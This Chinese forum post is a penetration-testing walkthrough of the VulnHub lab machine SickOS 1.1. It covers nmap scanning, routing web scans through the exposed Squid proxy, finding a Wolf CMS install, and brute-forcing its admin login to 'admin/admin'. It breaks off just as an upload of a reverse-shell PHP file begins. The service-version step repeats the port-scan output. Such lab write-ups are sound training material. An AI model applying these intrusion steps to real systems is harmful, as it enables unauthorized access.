ToB企服应用市场:ToB评测及商务社交产业平台
标题:
打靶记录 SickOS 1.1
[打印本页]
作者:
十念
时间:
2024-9-22 17:33
标题:
打靶记录 SickOS 1.1
https://www.vulnhub.com/entry/sickos-11,132/
主机发现端口扫描
探测存活主机,136是靶机,因为靶机是我最后添加的
nmap -sP 192.168.75.0/24
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:36 CST
Nmap scan report for 192.168.75.1
Host is up (0.00038s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00031s latency).
MAC Address: 00:50:56:FB:CA:45 (VMware)
Nmap scan report for 192.168.75.136
Host is up (0.00049s latency).
MAC Address: 00:0C:29:62:FB:04 (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.00027s latency).
MAC Address: 00:50:56:F8:B3:1A (VMware)
Nmap scan report for 192.168.75.131
Host is up.
复制代码
扫描靶机全部开放端口
nmap -sT -min-rate 10000 -p- 192.168.75.136
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:41 CST
Nmap scan report for 192.168.75.136
Host is up (0.00075s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:62:FB:04 (VMware)
复制代码
查看服务版本以及系统版本
nmap -sT -min-rate 10000 -p- 192.168.75.136
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:41 CST
Nmap scan report for 192.168.75.136
Host is up (0.00075s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:62:FB:04 (VMware)
复制代码
使用脚本扫描漏洞
nmap -script=vuln -p 22,3128,8080 192.168.75.136 -oA Desktop/test/vuln
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:46 CST
Nmap scan report for 192.168.75.136
Host is up (0.00085s latency).
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:62:FB:04 (VMware)
复制代码
web渗透
只有8080是关闭的,打开的只有3128 端口运行着squid署理服务和ssh,访问3128 ,返回
ERROR
The requested URL could not be retrieved
The following error was encountered while trying to retrieve the URL: /
Invalid URL
Some aspect of the requested URL is incorrect.
Some possible problems are:
Missing or incorrect access protocol (should be "http://" or similar)
Missing hostname
Illegal double-escape in the URL-Path
Illegal character in hostname; underscores are not allowed.
Your cache administrator is webmaster.
Generated Sun, 22 Sep 2024 06:03:35 GMT by localhost (squid/3.1.19)
复制代码
可知版本是3.1.19 ,因为他是个署理服务器,所以大概会署理着什么,大概就是80端口
因为我的火狐毗连着的是burp的署理地点,如果想要再通过署理访问别的网站并且能抓包的话,就需要设置burp上游署理服务器
大概在:network->connection->upstreamserver 把署理地点192.168.75.136:3128 添加上去即可
访问192.168.75.136 ,页面有回显了,那就表示80在192.168.75.136:3128 下署理着
# 内容
BLEHHH!!!
复制代码
是个网路用词
扫描目录,需要指定署理服务器
python .\dirsearch.py -u http://192.168.75.136 --proxy 192.168.75.136:3128
//
[12:15:18] 403 - 243B - /cgi-bin/
[12:15:19] 200 - 109B - /connect
[12:15:20] 403 - 239B - /doc/
[12:15:20] 403 - 242B - /doc/api/
[12:15:20] 403 - 247B - /doc/html/index.html
[12:15:20] 403 - 249B - /doc/en/changes.html
[12:15:20] 403 - 247B - /doc/stable.version
[12:15:29] 200 - 58B - /robots.txt
[12:15:30] 403 - 242B - /server-status
[12:15:30] 403 - 242B - /server-status/
复制代码
发现robots.txt以及connect
connect内容
#!/usr/bin/python
print "I Try to connect things very frequently\n"
print "You may want to try my services"
复制代码
robots.txt 内容
User-agent: *
Disallow: /
Dissalow: /wolfcms
复制代码
给我们提示wolfcms
访问/wolfcms ,是一个内容管理cms,爆破目录
python .\dirsearch.py -u http://192.168.75.136/wolfcms --proxy 192.168.75.136:3128
//
[12:18:17] 200 - 403B - /wolfcms/composer.json
....
[12:18:17] 200 - 4KB - /wolfcms/CONTRIBUTING.md
[12:18:18] 301 - 253B - /wolfcms/docs -> http://192.168.75.136/wolfcms/docs/
[12:18:18] 200 - 512B - /wolfcms/docs/
[12:18:18] 200 - 2KB - /wolfcms/docs/updating.txt
[12:18:19] 200 - 894B - /wolfcms/favicon.ico
[12:18:26] 301 - 257B - /wolfcms/public -> http://192.168.75.136/wolfcms/public/
[12:18:26] 200 - 462B - /wolfcms/public/
[12:18:26] 200 - 2KB - /wolfcms/README.md
[12:18:27] 200 - 20B - /wolfcms/robots.txt
复制代码
发现robots.txt以及readme.md
访问后robots.txt 是空的,readme.md 为设置阐明
通过查阅得知后台登岸地点在/wolfcms/?/admin/login
网路搜刮默认账号暗码尝试,登岸失败
使用burp进行爆破,指定账号为admin ,通过暗码字典爆破
爆破乐成,账号暗码都是 admin
获得初级shell
<ul>登岸进去后探求可利用点,找到 uploadfile
在 file→Uploadfile
上传反弹shell代码文件
[code]//getshell.php
欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)
Powered by Discuz! X3.4